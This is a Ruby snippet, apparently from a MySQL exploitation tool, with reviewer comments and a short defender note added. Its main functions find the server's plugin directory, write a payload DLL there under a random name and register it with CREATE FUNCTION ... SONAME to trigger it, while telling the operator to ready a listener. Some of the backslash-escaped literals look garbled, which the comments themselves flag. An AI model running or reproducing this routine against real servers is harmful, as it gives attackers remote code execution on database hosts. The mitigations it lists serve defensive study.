# Code Snippet continuation, by HR
# Determine the plugin directory
# This is where the UDF needs to be written
# Pass in the MySQL connection object (dbc)
# Ask the server for its plugin directory and return it as a string that ends
# in a path separator, with the backslash runs in the path re-escaped.
#
# NOTE(review): the backslash-escaped quotes and the long backslash runs in the
# literals below look like extraction escaping; confirm the exact counts
# against the original file before relying on them.
#
# @param dbc MySQL connection object; only #query is called on it here
# @return [String] plugin directory path with a trailing separator
#
# On Mysql::Error the method prints three messages and terminates the process
# instead of raising to the caller.
def get_plugin_dir(dbc)
begin
q = dbc.query(\'SELECT @@plugin_dir;\')
# First column of each returned row is stored in @pdir; the last row wins.
q.each { |x| @pdir=x[0]; }
# NOTE(review): @pdir is instance state and is never reset in this method, so
# a value left over from an earlier call would skip the fallback below.
if @pdir.nil?
# Fallback: take the value column (index 1) of the basedir variable and append
# the lib\plugin sub-path. The backslash separators assume a Windows server.
q = dbc.query("SHOW VARIABLES LIKE \'basedir\';")
q.each { |x| @pdir=x[1]; }
# NOTE(review): if this query also yields no rows, @pdir is still nil and
# .split raises NoMethodError, which the rescue clause below does not catch.
plugpath = @pdir.split("\\\\").join("\\\\\\\\")
plugpath += "\\\\\\\\lib\\\\\\\\plugin\\\\\\\\"
else
# plugin_dir was reported directly: re-escape it and add a trailing separator.
plugpath = @pdir.split("\\\\").join("\\\\\\\\")
plugpath += "\\\\\\\\"
end
return plugpath
rescue Mysql::Error => e
puts "Problem determining the plugins directory!"
puts "\\t=> #{e}"
puts "Sorry, can\'t continue without this piece....\\n\\n"
# Status 666 does not fit in one byte; on POSIX the parent process sees only
# the low 8 bits of the exit status.
exit 666;
end
end
# Create new function tied to custom DLL
# Once created (and called) it should trigger the DLL payload
# Write `file` into the server's plugin directory under a random .dll name and
# register a SQL function whose SONAME is that library.
#
# randz and write_bin_file are defined outside this snippet; presumably randz(n)
# returns a random string and write_bin_file returns truthy on success - confirm.
#
# @param dbc MySQL connection object; only #query is called on it here
# @param file payload passed through unchanged to write_bin_file
# @return [String, nil] the generated function name, or nil (implicit) when
#   write_bin_file returns a falsy value
#
# Defender view: the artefacts left on the server are a new .dll with a random
# name in plugin_dir and a CREATE FUNCTION ... SONAME statement for a sys_*
# function. Audit logging of CREATE FUNCTION, file-integrity monitoring on the
# plugin directory, a restrictive secure_file_priv, and withholding FILE and
# write access to the mysql schema from application accounts cover this path.
def create_custom_function(dbc, file)
dll_name = randz(15) + ".dll"
plugin_path = get_plugin_dir(dbc)
# Full destination path is kept in instance state (@udf_dest), not returned.
@udf_dest = plugin_path.chomp + dll_name
fake_function = \'sys_\' + randz(5)
# Upload our UDF DLL Payload file
if write_bin_file(dbc, file, @udf_dest)
begin
puts "Payload DLL writen to disk!"
puts "Creating function to trigger now...."
puts "Make sure your listener is ready...."
sleep(3)
# Drop function if its already there, then create new
# The results assigned to q are never read. SONAME is given the bare file name
# only, not the full path held in @udf_dest.
q = dbc.query("DROP FUNCTION IF EXISTS #{fake_function};")
q = dbc.query("CREATE FUNCTION #{fake_function} RETURNS string SONAME \'#{dll_name}\';")
return fake_function
rescue Mysql::Error => e
# A Mysql::Error from either statement is reported as a success and the name is
# still returned; e is unused, so the caller cannot tell whether the function
# was actually created.
puts "Error Triggered, Payload should have also been triggered!"
return fake_function
end
end
end